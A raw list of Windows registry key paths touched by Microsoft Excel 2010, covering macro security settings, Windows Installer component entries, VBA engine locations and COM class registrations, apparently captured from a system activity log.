HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\14.0\Common
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Common\VbaOff
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\VbaOff
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-120665959-548228820-2376508522-1001\Components\98C6F8355DA2600418456C7670479E08
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\98C6F8355DA2600418456C7670479E08
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-120665959-548228820-2376508522-1001\Installer\Products\00004109D30000000000000000F01FEC
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Installer\Products\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\InstallProperties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\14.0\Registration
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Registration\{90140000-003D-0000-0000-0000000FF1CE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Registration\{90140000-003D-0000-0000-0000000FF1CE}\DigitalProductID
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-120665959-548228820-2376508522-1001\Installer\Features\00004109D30000000000000000F01FEC
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Installer\Features\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\00004109D30000000000000000F01FEC\EXCELFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Features
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Features\EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\98C6F8355DA2600418456C7670479E08\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9E7E71FA8D502F64CBDEC044521ED39A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9E7E71FA8D502F64CBDEC044521ED39A\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F53CAB350CF77D94AA5184C9C5104C0D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F53CAB350CF77D94AA5184C9C5104C0D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49DFBA7AF457A8B4EBD5783F921FACC2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49DFBA7AF457A8B4EBD5783F921FACC2\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E76572D8D3D52F449849F14EDCB67B3D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E76572D8D3D52F449849F14EDCB67B3D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\304225DA0A80689489E4CEBA8B478F00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\304225DA0A80689489E4CEBA8B478F00\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B6C468F8F8250534E92DA89F1E20D9B0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B6C468F8F8250534E92DA89F1E20D9B0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\567D3332CC8D8B342B449DA5431AD4A3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\567D3332CC8D8B342B449DA5431AD4A3\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AD4E638E8714C454FA1AD399C0E81909
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AD4E638E8714C454FA1AD399C0E81909\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\463248DC02BD31044AFEAB6A1D3BFBE6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\463248DC02BD31044AFEAB6A1D3BFBE6\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CAB7071E27686994093945B9EE85F69D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CAB7071E27686994093945B9EE85F69D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4F50307A57404AD4282F43A591BABC84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4F50307A57404AD4282F43A591BABC84\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05CEA9EC5FEA8574EA748DE4ABC952AD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\05CEA9EC5FEA8574EA748DE4ABC952AD\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0B5C02588961CF8428890C980B9F3DD0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0B5C02588961CF8428890C980B9F3DD0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\00004109D30000000000000000F01FEC\ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Features\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A609E893B628DD84791945C946C9CA5E
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A609E893B628DD84791945C946C9CA5E\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E96B8FAE7CEA69C42B5B73BA69B21A71
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E96B8FAE7CEA69C42B5B73BA69B21A71\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F58FB719C858BF4EAF245AC9DA59D1D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6F58FB719C858BF4EAF245AC9DA59D1D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D90B8D0738CEDB14593B99ADD26D72C0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D90B8D0738CEDB14593B99ADD26D72C0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29731734CD2333940995A2B963A7E582
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29731734CD2333940995A2B963A7E582\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2D762436AF7B6B543820741456BDAF60
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2D762436AF7B6B543820741456BDAF60\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0F2A7E907B078294BBD356DC8840852C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0F2A7E907B078294BBD356DC8840852C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\379E92CC2CB71D119A12000A9CE1A22A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\379E92CC2CB71D119A12000A9CE1A22A\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D9C9EE5ED897D1D4BA2F23CE5128B0F2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D9C9EE5ED897D1D4BA2F23CE5128B0F2\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\818AED26EAB038A4BB72C55277E8CE84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\818AED26EAB038A4BB72C55277E8CE84\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\687330DB272F1A54C967131CC53B826C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\687330DB272F1A54C967131CC53B826C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\723C2F65179512E4D80BD2034028D528
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\723C2F65179512E4D80BD2034028D528\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D8F5AB6B3B3FBA149A58A12B4A20334C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D8F5AB6B3B3FBA149A58A12B4A20334C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2338564DA4241F499CB8A1F84247C0E
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E2338564DA4241F499CB8A1F84247C0E\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\54077434B37616D4A9EA6F78E98A56BF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\54077434B37616D4A9EA6F78E98A56BF\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\723BCECF7B08D0A4F864A2A08963643F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\723BCECF7B08D0A4F864A2A08963643F\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9D474E7E9FB172E42A102B59039D88B0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9D474E7E9FB172E42A102B59039D88B0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D18DE905BD78FC48A594175D75DF03C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D18DE905BD78FC48A594175D75DF03C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\85F98C50329537041A94BEA8DB880526
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\85F98C50329537041A94BEA8DB880526\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4E6F86E1FEF077645B1002B7C560B871
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4E6F86E1FEF077645B1002B7C560B871\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E009C76CEC08635368DB50E4DDD1CAA1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E009C76CEC08635368DB50E4DDD1CAA1\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7122F57A45DA6AE3EA412F558F665013
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7122F57A45DA6AE3EA412F558F665013\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A70728DA97715E8389326C667D0C7579
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A70728DA97715E8389326C667D0C7579\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B4CCCEF758F027B37977C1762C52F53C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B4CCCEF758F027B37977C1762C52F53C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A6D2077B64803E30B7837065053EB74
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A6D2077B64803E30B7837065053EB74\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CCCB6CC6A1A288037B4AA64D8B1B14B2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CCCB6CC6A1A288037B4AA64D8B1B14B2\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ACEFFF49077DF5C37898805E60656DBF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ACEFFF49077DF5C37898805E60656DBF\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A8CD4AD91379E0F3B85DCF71AC8684DA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A8CD4AD91379E0F3B85DCF71AC8684DA\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFE8E5A39EFFBFB3C91EB0A7344C3917
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFE8E5A39EFFBFB3C91EB0A7344C3917\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0F8B3D16074B2F53B855F7CCCDC83FF6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0F8B3D16074B2F53B855F7CCCDC83FF6\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FB77723BFCB84D138A19CBBF155CD452
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FB77723BFCB84D138A19CBBF155CD452\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1C0EE3236E87CE636B08EE9C7403EE19
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1C0EE3236E87CE636B08EE9C7403EE19\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9FCE2B9622F87F2339EDB74D395D7D09
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9FCE2B9622F87F2339EDB74D395D7D09\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\45613AFAE1635B33E95D40A9869823C5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\45613AFAE1635B33E95D40A9869823C5\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6BD3219F5F227C1388E4B254ECC53CBA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6BD3219F5F227C1388E4B254ECC53CBA\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96EB09331608BA034B79232D764B2973
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\96EB09331608BA034B79232D764B2973\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\13A31C284359A9136A90E7B8EFC2DFBB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\13A31C284359A9136A90E7B8EFC2DFBB\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FC271526B8EBA073BB778D86B925A4D6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FC271526B8EBA073BB778D86B925A4D6\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\45552A042794885318BD5875621A61DA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\45552A042794885318BD5875621A61DA\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9BB8A76146A1B263E890F48D1B0F01E8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9BB8A76146A1B263E890F48D1B0F01E8\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7DBB1C92272110335A0AED12BD0473EB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7DBB1C92272110335A0AED12BD0473EB\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37709EB0F01C4FB319422B4DA2B2135C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\37709EB0F01C4FB319422B4DA2B2135C\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E0F2919EC5305C236A7AD687E12EB4D3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E0F2919EC5305C236A7AD687E12EB4D3\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\595273BDEAD50DF3E8E69B1B0681CE84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\595273BDEAD50DF3E8E69B1B0681CE84\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1BEF2E9B13536084DBE2F1D2C9CCF79B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1BEF2E9B13536084DBE2F1D2C9CCF79B\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9DA7BAFB053D9AE41AE7AAC762F84E26
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9DA7BAFB053D9AE41AE7AAC762F84E26\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\638BAF8FEC5E9F645963D084A26A0B2D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\638BAF8FEC5E9F645963D084A26A0B2D\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6C9A6F846E2818A47A408CAF13381C71
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6C9A6F846E2818A47A408CAF13381C71\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\00004109D30000000000000000F01FEC\VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Features\VBAFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\80EDA8F656FB006448BF06CFEF8BFC4E
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\80EDA8F656FB006448BF06CFEF8BFC4E\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4EEF86DD963C1D111A37000A9CA05BF0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4EEF86DD963C1D111A37000A9CA05BF0\00004109D30000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\VBA
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\VBA\Vbe7DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-120665959-548228820-2376508522-1001\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Components\029E403DA86A1D115B5B0006799C897E\vbe.dll_7.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage\VBAFiles
HKEY_CLASSES_ROOT\Typelib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\0\win32\(Default)
HKEY_CLASSES_ROOT\Typelib\{00020813-0000-0000-C000-000000000046}\1.7\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.7\0\win32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\14.0\Excel\Security
